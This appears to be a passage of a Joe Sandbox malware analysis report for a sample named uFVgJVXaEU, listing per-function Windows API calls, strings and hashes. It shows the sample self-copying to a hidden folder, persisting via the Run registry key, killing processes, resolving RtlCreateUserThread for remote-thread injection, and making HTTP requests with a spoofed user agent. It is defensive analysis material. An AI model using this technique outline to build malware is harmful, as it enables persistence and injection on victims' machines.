                                                                                                                                                                                                                        • Opcode ID: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
                                                                                                                                                                                                                        • Instruction ID: 5b1fee75b434fa0edca83a36c5ff8517d6b4ec7c120358d072d333dce567417c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71F0541590C18285EB30B715680433DF790BB69708F88157AD58D055A5CF3CD609CF3B

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        control_flow_graph 422 7ff7e83c14ec-7ff7e83c1528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00007FF7E83C15F1,?,?,?,?,?,?,?,?,00007FF7E83C3418), ref: 00007FF7E83C14FF
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,00007FF7E83C15F1,?,?,?,?,?,?,?,?,00007FF7E83C3418), ref: 00007FF7E83C1514
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                                                                                                        • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction ID: 3cdb3e5c05266597902de9561afa6790c4269cad5f47727d64a9500bd7262fe8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7E09276508F80D6C620AB15F84015EB7B4FBC8794F944125EACD42B28CF3CC269CB14

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7E83C3744
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3704: GetVolumeInformationW.KERNELBASE ref: 00007FF7E83C37C1
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3704: wsprintfW.USER32 ref: 00007FF7E83C3862
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38CD
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38E2
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38F5
                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3905
                                                                                                                                                                                                                        • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3918
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C392D
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3940
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3955
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: 1b61880e004d43661280f0cb070f80f860ebf9c3e77f95e2088ce91db1cafed7
                                                                                                                                                                                                                        • Instruction ID: bcda5de7ac1e48998e5049fa36798880b83ec74535c57f7083d3c8ae5816b956
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b61880e004d43661280f0cb070f80f860ebf9c3e77f95e2088ce91db1cafed7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B114F3562898685DB60AB25F86436EF361FBD8744F85603ADA4E43E28DF3CD108C769

                                                                                                                                                                                                                        Control-flow Graph

APIs
  • Part of subcall function 00007FF7E83C3704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7E83C3744
  • Part of subcall function 00007FF7E83C3704: GetVolumeInformationW.KERNELBASE ref: 00007FF7E83C37C1
  • Part of subcall function 00007FF7E83C3704: wsprintfW.USER32 ref: 00007FF7E83C3862
  • Part of subcall function 00007FF7E83C3884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38CD
  • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38E2
  • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C38F5
  • Part of subcall function 00007FF7E83C3884: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3905
  • Part of subcall function 00007FF7E83C3884: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3918
  • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C392D
  • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3940
  • Part of subcall function 00007FF7E83C3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C3A69), ref: 00007FF7E83C3955
• GetModuleFileNameW.KERNEL32 ref: 00007FF7E83C3A79
• DeleteFileW.KERNELBASE ref: 00007FF7E83C3A84
• CopyFileW.KERNELBASE ref: 00007FF7E83C3A9D
• SetFileAttributesW.KERNELBASE ref: 00007FF7E83C3AB5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
• Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
Similarity
• API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
• String ID: Services
• API String ID: 3209240227-2319745855
• Opcode ID: 163988942e6ae4ff26b83112ee0362cfd600fbc072332237c5b9d851307db1dc
• Instruction ID: 4fb6649795aeb34c28ef6f20e768935f681dc1314c2ffb1fe4f2a8c442210b4c
• Opcode Fuzzy Hash: 163988942e6ae4ff26b83112ee0362cfd600fbc072332237c5b9d851307db1dc
• Instruction Fuzzy Hash: 5E018861A1858252DB50EB24E8543AEF360FBA4744FD4503BD24D835B4EE3CD20ACB25

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
• Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
Similarity
• API ID: DirectoryInformationVolumeWindowswsprintf
• String ID: %08lX%04lX%lu
• API String ID: 3001812590-640692576
• Opcode ID: 1f59420b8f827cfb11394142374efd971ec66bac13221c6480dae27b971b1b6b
• Instruction ID: 8b7f76e87300aade8f7939bcd8d79fcab0e34d6c7a06bac65964dd50d826c568
• Opcode Fuzzy Hash: 1f59420b8f827cfb11394142374efd971ec66bac13221c6480dae27b971b1b6b
• Instruction Fuzzy Hash: 7A31D92661C6C186DB30EB64E4983AEF3A0FB94704F90113AE68D87A68DB7DD509CB15

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
• Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
Similarity
• API ID: CloseOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Run
• API String ID: 779948276-1428018034
• Opcode ID: 1d2af400ed1d53b821f5eb59e2e4f5bf11a65c77a1e5104fedf3b789aa3a2d8d
• Instruction ID: c126a2d1605346789c162097840d7e38ea42cb33e2498984e491b2cd4cda57f7
• Opcode Fuzzy Hash: 1d2af400ed1d53b821f5eb59e2e4f5bf11a65c77a1e5104fedf3b789aa3a2d8d
• Instruction Fuzzy Hash: 09115E36628A8086D7909B14F44472EF7A0FB947A0F545235F9AE43BE8DF7CD185CB24

Control-flow Graph

control_flow_graph 423 7ff7e83c3ae4-7ff7e83c3af3 424 7ff7e83c3af5-7ff7e83c3b02 VirtualFree 423->424 425 7ff7e83c3b08-7ff7e83c3b0c 423->425 424->425
APIs
Memory Dump Source
• Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
• Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
• Instruction ID: e05274b568db1f5d0e613bacec9d06c5199fbc2a3c3a04a39bc81dd096c6eeee
• Opcode Fuzzy Hash: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
• Instruction Fuzzy Hash: ACD01221E3994181E794EB26E88971DFBA0FBD4744FC4803AE68941964CF3CC199CF15

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 426 7ff7e83c3b14-7ff7e83c3b3a VirtualAlloc
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                        • Opcode ID: 7ed7f4f9e3a1e5303470ef457a719a49b487dd8a302f99ec74e3d8dd35d9eee5
                                                                                                                                                                                                                        • Instruction ID: 8f9c47c137280ac90897d665caccbc8c589cb66026086c33fb9a485b04da9387
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ed7f4f9e3a1e5303470ef457a719a49b487dd8a302f99ec74e3d8dd35d9eee5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9AC012B1F261808BDB1CAF22E491B0AAA60A794740F908429EA4267B84C93EC2528F04
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7E83C219D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                        • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                        • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                        • Opcode ID: 3344087d9ea4d8767dad2cf8c1e5dc35776cf689aa0c01a0ee6867c1dab9e5ae
                                                                                                                                                                                                                        • Instruction ID: e4d35375bcd706865b47436049aae05167bca1d68c155442bf7ce8ca814174d1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3344087d9ea4d8767dad2cf8c1e5dc35776cf689aa0c01a0ee6867c1dab9e5ae
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD710832518A8186E760EB51F49832EF7A0FBD4794F94103AEA8E43A68CF7CD5448B25
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: OpenProcess
                                                                                                                                                                                                                        • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                        • API String ID: 3743895883-721857904
                                                                                                                                                                                                                        • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction ID: fce28ca8dba2a3c9788a4213c94c3a151d22471c4bb07c72d52477b5afe40e79
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66713B32A0CA8186E770EB14E44436EF3A0FB94384F94413AD68D82B99DF7CD484DB66
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1083639309-0
                                                                                                                                                                                                                        • Opcode ID: 7ff7261aa3a773e33927d72f78d727c784ebe6b86b23e25676c598a25c4e3fb2
                                                                                                                                                                                                                        • Instruction ID: f20dea61b24e2115bc116d4d495728aa2864a0370a8979b60e25d233de1a3829
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ff7261aa3a773e33927d72f78d727c784ebe6b86b23e25676c598a25c4e3fb2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39210331A1CA8581EB70EF21E84836EF360FBE4754F84423AC69D429A8DF3DD545CB25
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Version
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1889659487-0
                                                                                                                                                                                                                        • Opcode ID: b7b7595815e33f1c26c97fb711478bec0568d9ece5cc850361180fa3fc2c026a
                                                                                                                                                                                                                        • Instruction ID: 7e0d0ed0ee09b1515a22fb937017c3f209df4328051921ce4283baa02d9df81a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7b7595815e33f1c26c97fb711478bec0568d9ece5cc850361180fa3fc2c026a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EAF0AF3190C242C2EE74DA01A90937DF2E0E76D348FC8027FD24C415A4DE3DD5488E3A
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                                                                        • Opcode ID: fd4e5232eadf4f87905bec873136a68cde2c0ceb075ae6d8ef107053c4164afd
                                                                                                                                                                                                                        • Instruction ID: 9df142c4c7b62e77ddedd520d0f8db78673d6c2fab0884f93f4c12e2754584f8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd4e5232eadf4f87905bec873136a68cde2c0ceb075ae6d8ef107053c4164afd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AE03922A1C051C2E7605720E50433EF2F6F7A4B44F844636EA8DC2694EE3CCA409A65
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2693768547-0
                                                                                                                                                                                                                        • Opcode ID: c083718f08d0c72eded97b33700526ef96675f7b3bff10be0d6bfba5df6ede19
                                                                                                                                                                                                                        • Instruction ID: 69b50339a104226ac0822bbb01622a2093fbeb45684e1a5f8aaa66bffc939306
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c083718f08d0c72eded97b33700526ef96675f7b3bff10be0d6bfba5df6ede19
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF811B36608B8186EA50DB55F88436EF7A0FBD8B91F55413ADA8D83B68DF3CD0448B25
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C4404: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C30A7), ref: 00007FF7E83C444C
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C4404: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C30A7), ref: 00007FF7E83C4489
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C4404: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C30A7), ref: 00007FF7E83C4494
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3B44: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E83C30AC), ref: 00007FF7E83C3B87
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3B44: RegSetValueExW.ADVAPI32 ref: 00007FF7E83C3BBD
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3B44: RegCloseKey.ADVAPI32 ref: 00007FF7E83C3BCC
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3BE4: RegDeleteKeyW.ADVAPI32 ref: 00007FF7E83C3BFC
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7E83C3DF7
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: Process32FirstW.KERNEL32 ref: 00007FF7E83C3E2A
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: CloseHandle.KERNEL32 ref: 00007FF7E83C3E3C
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: wcscmp.MSVCRT ref: 00007FF7E83C3E51
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: OpenProcess.KERNEL32 ref: 00007FF7E83C3E67
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: TerminateProcess.KERNEL32 ref: 00007FF7E83C3E8A
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: CloseHandle.KERNEL32 ref: 00007FF7E83C3E98
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: Process32NextW.KERNEL32 ref: 00007FF7E83C3EAB
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3DE4: CloseHandle.KERNEL32 ref: 00007FF7E83C3EBD
                                                                                                                                                                                                                          • Part of subcall function 00007FF7E83C3974: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7E83C3ACC), ref: 00007FF7E83C39A4
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 00007FF7E83C3156
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
